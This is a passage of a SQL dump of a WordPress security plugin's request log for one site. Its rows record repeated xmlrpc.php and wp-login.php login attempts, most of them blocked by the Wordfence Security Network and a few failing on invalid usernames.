Network',NULL),(11205,0.000000,1631420192.541957,'\0\0\0\0\0\0\0\0\0\0�����C',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11206,0.000000,1631420463.492007,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11207,0.000000,1631420725.068859,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11208,0.000000,1631420980.732647,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11209,0.000000,1631421233.449861,'\0\0\0\0\0\0\0\0\0\0���)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11210,0.000000,1631421494.649217,'\0\0\0\0\0\0\0\0\0\0��@�\0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11211,0.000000,1631421539.124705,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11212,0.000000,1631421747.483357,'\0\0\0\0\0\0\0\0\0\0��[�ɤ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11213,0.000000,1631421992.156908,'\0\0\0\0\0\0\0\0\0\0��_���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11214,0.000000,1631422514.615205,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11215,0.000000,1631422758.173713,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11216,0.000000,1631423010.113427,'\0\0\0\0\0\0\0\0\0\0���>M�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11217,0.000000,1631423245.038986,'\0\0\0\0\0\0\0\0\0\0��n��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11218,0.000000,1631423409.342505,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11219,0.000000,1631423505.339718,'\0\0\0\0\0\0\0\0\0\0��ν4�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11220,0.000000,1631423766.157321,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11221,0.000000,1631424056.178435,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11222,0.000000,1631424301.758272,'\0\0\0\0\0\0\0\0\0\0���)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11223,0.000000,1631424569.484744,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11224,0.000000,1631424826.447977,'\0\0\0\0\0\0\0\0\0\0��n-p',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11225,0.000000,1631425109.254157,'\0\0\0\0\0\0\0\0\0\0��]Y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11226,0.000000,1631425240.465277,'\0\0\0\0\0\0\0\0\0\0��E�φ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11227,0.000000,1631425362.240204,'\0\0\0\0\0\0\0\0\0\0����3�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11228,0.000000,1631425613.581689,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11229,0.000000,1631425886.303180,'\0\0\0\0\0\0\0\0\0\0���,�1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11230,0.000000,1631426169.616650,'\0\0\0\0\0\0\0\0\0\0��xO�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11231,0.000000,1631426468.484072,'\0\0\0\0\0\0\0\0\0\0��[�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11232,0.000000,1631426656.116588,'\0\0\0\0\0\0\0\0\0\0����e�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11233,0.000000,1631426747.170316,'\0\0\0\0\0\0\0\0\0\0��\rJ��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11234,0.000000,1631427031.755728,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11235,0.000000,1631427117.644356,'\0\0\0\0\0\0\0\0\0\0�����q',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11236,0.000000,1631427974.122789,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11237,0.000000,1631428263.894084,'\0\0\0\0\0\0\0\0\0\0���� ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11238,0.000000,1631428552.301761,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11239,0.000000,1631428838.090201,'\0\0\0\0\0\0\0\0\0\0��E��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11240,0.000000,1631428935.132985,'\0\0\0\0\0\0\0\0\0\0�����[',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11241,0.000000,1631429130.709931,'\0\0\0\0\0\0\0\0\0\0��#ÇC',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11242,0.000000,1631429406.373051,'\0\0\0\0\0\0\0\0\0\0��J�g�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11243,0.000000,1631429692.834994,'\0\0\0\0\0\0\0\0\0\0���\"�r',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11244,0.000000,1631429978.337512,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11245,0.000000,1631430263.931823,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11246,0.000000,1631430526.426666,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11247,0.000000,1631430875.240144,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11248,0.000000,1631431125.318518,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11249,0.000000,1631431422.431131,'\0\0\0\0\0\0\0\0\0\0��w`�;',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11250,0.000000,1631431697.602229,'\0\0\0\0\0\0\0\0\0\0�����Q',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11251,0.000000,1631432007.940849,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11252,0.000000,1631432281.084191,'\0\0\0\0\0\0\0\0\0\0����>�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11253,0.000000,1631432596.706678,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11254,0.000000,1631432618.069915,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11255,0.000000,1631432887.873689,'\0\0\0\0\0\0\0\0\0\0����w!',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11256,0.000000,1631433188.065359,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11257,0.000000,1631433488.670423,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11258,0.000000,1631433794.287747,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11259,0.000000,1631434066.901140,'\0\0\0\0\0\0\0\0\0\0���n�J',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11260,0.000000,1631434376.942211,'\0\0\0\0\0\0\0\0\0\0���c/',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11261,0.000000,1631434528.226540,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11262,0.000000,1631434694.184785,'\0\0\0\0\0\0\0\0\0\0��%���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11263,0.000000,1631434969.596777,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11264,0.000000,1631435305.935516,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11265,0.000000,1631435596.087318,'\0\0\0\0\0\0\0\0\0\0��gR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11266,0.000000,1631435912.097729,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11267,0.000000,1631436224.789612,'\0\0\0\0\0\0\0\0\0\0��\"DaF',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11268,0.000000,1631436353.335652,'\0\0\0\0\0\0\0\0\0\0���zɁ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11269,0.000000,1631436542.281347,'\0\0\0\0\0\0\0\0\0\0�����1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11270,0.000000,1631436861.334389,'\0\0\0\0\0\0\0\0\0\0����*J',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11271,0.000000,1631437147.923276,'\0\0\0\0\0\0\0\0\0\0��h��.',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11272,0.000000,1631437464.127598,'\0\0\0\0\0\0\0\0\0\0��[�o}',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11273,0.000000,1631437803.470403,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11274,0.000000,1631438143.959650,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11275,0.000000,1631438434.769683,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11276,0.000000,1631438553.096083,'\0\0\0\0\0\0\0\0\0\0��e ��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11277,0.000000,1631438777.073748,'\0\0\0\0\0\0\0\0\0\0����zX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11278,0.000000,1631439415.725740,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11279,0.000000,1631439749.509781,'\0\0\0\0\0\0\0\0\0\0���C�h',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11280,0.000000,1631440083.782968,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11281,0.000000,1631440416.176756,'\0\0\0\0\0\0\0\0\0\0���O�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11282,0.000000,1631440738.566798,'\0\0\0\0\0\0\0\0\0\0����zX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11283,0.000000,1631441053.115889,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11284,0.000000,1631441397.802249,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11285,0.000000,1631441736.569243,'\0\0\0\0\0\0\0\0\0\0���zR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11286,0.000000,1631442078.911532,'\0\0\0\0\0\0\0\0\0\0��\"V��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11287,0.000000,1631442387.017439,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11288,0.000000,1631443084.854801,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11289,0.000000,1631443384.140898,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11290,0.000000,1631443429.553692,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11291,0.000000,1631443756.603961,'\0\0\0\0\0\0\0\0\0\0��-w��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11292,0.000000,1631444113.779811,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11293,0.000000,1631444449.400262,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11294,0.000000,1631444793.507370,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11295,0.000000,1631445143.898757,'\0\0\0\0\0\0\0\0\0\0�����Q',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11296,0.000000,1631445489.246197,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11297,0.000000,1631445841.167411,'\0\0\0\0\0\0\0\0\0\0����\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by 